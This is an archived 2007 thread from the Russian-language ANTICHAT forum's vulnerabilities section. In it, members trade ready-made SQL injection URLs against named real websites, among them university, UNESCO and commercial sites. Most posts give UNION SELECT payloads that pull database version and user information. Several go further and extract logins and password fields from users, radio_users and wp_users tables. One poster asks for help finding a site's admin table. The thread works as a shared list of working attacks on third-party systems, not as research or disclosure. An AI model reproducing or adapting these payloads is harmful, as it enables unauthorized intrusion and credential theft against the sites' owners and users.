HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.06.2007, 17:06
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

http://www.databasepublish.com/
Код:
http://www.databasepublish.com/news.php?id=-51+union+select+1,version(),user(),4,5,6,7,8,9,10,11+from+users/*
И даже есть доступ к таблице users! Но password вывадить решительно отказывается. Кидает на index.


http://www.grid.iu.edu/
Код:
http://www.grid.iu.edu/news/news.php?id=-68+union+select+1,2,user(),4,version(),6,7,8/*
Ну и так, по мелочи:
Код:
http://www.insanelygreatmac.com/news.php?id=-3571+union+select+concat(user(),1,version())/*
http://www.simonv.com/music/release.php?id=-78+union+select+concat(user(),version())/*
http://www.kaldor.com/media-release.php?id=-5+union+select+concat(user(),version())/*
 
Ответить с цитированием

  #2  
Старый 12.06.2007, 20:17
Aerot1smo
Banned
Регистрация: 06.07.2006
Сообщений: 83
Провел на форуме:
644264

Репутация: 26
По умолчанию

http://canadatype.com/showfont.php?id=-1+union+select+version(),2,3,4,5,6/*
http://www.big6.com/showenewsarticle.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*

Последний раз редактировалось ice1k; 12.06.2007 в 20:24..
 
Ответить с цитированием

sql
  #3  
Старый 12.06.2007, 20:43
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Би-2 (оф. сайт группы)

http://www.bdva.ru/

-> версия - пятерка

названия всех табличек и колонок выводятся без лимита посредством запроса:
Цитата:
http://www.bdva.ru/chtivo.phtml?id=-241+union+select+1,2,concat_ws(0x203a20,table_sche ma,table_name,column_name),4,5,6,7,8,9+from+inform ation_schema.columns/*
-> есть форум phpbb_users.
Есть еще табличка, где фигурируют пароли - radio_users
Цитата:
http://www.bdva.ru/chtivo.phtml?id=-241+union+select+1,2,concat_ws(0x203a20,id,name,lo gin,pass,www,mail),4,5,6,7,8,9+from+radio_users/*
 
Ответить с цитированием

  #4  
Старый 13.06.2007, 01:54
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


Cool

www.stanford.edu
version() - 5
Код:
http://www.stanford.edu/group/irepp/cgi-bin/event-detail-popup.php?recordID=-1+union+select+1,concat_ws(0x3b,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/*
honors.uoregon.edu
Код:
http://honors.uoregon.edu/faculty/profiles/index.php?id=-12'+union+select+1,2,3,4,5,concat_ws(0x3b,user(),database(),version()),7,8,9,10,'Mafia%20Of%20Antichat',12,13,14,15,16/*

Последний раз редактировалось Isis; 13.06.2007 в 02:16..
 
Ответить с цитированием

  #5  
Старый 13.06.2007, 13:09
BromTyZ
Новичок
Регистрация: 18.03.2007
Сообщений: 7
Провел на форуме:
8393

Репутация: 8
По умолчанию

Помогите подобрать название таблицы с юзерам(админом) плиз!
Код:
http://sexsihop.in.ua/detail.php?detail=-1+union+select+1,2,3,4,5,6,7,8

Последний раз редактировалось BromTyZ; 13.06.2007 в 14:17..
 
Ответить с цитированием

  #6  
Старый 13.06.2007, 13:19
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

Чёт, сёня не прёт.
Код:
http://www.big6.com/showarticle.php?id=-415+union+select+concat(user(),version()),2,3,4,5/*
http://www.pimpsurveys.com/view-survey.php?id=737+union+select+1,user(),version(),database()/* - в самом низу.
 
Ответить с цитированием

  #7  
Старый 13.06.2007, 14:22
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

http://www.crim.ncsu.edu/
Код:
http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x203a20,name,pwd),17+from+user/*
http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x203a20,user_login,user_pass),1+from+wp_users+limit+0,2/*
 
Ответить с цитированием

  #8  
Старый 13.06.2007, 16:12
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://women.unesco.kz/base.php?id=-2+union+select+concat(login,char(58),pwd)+from+users+limit+0,1/*
 
Ответить с цитированием

  #9  
Старый 13.06.2007, 17:56
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

Код:
http://intercar.com.ua/index.php?id=-20+union+select+1,2,concat_ws(0x3b20,user(),database(),version()),4,5,6/*
 
Ответить с цитированием

  #10  
Старый 13.06.2007, 21:02
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию

Сайт: pec.spb.ru
http://www.pec.spb.ru/dictionary/?id=-218+union+select+1,concat_ws(char(58),name,passwor d,email),3+from+users+limit+8,1/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ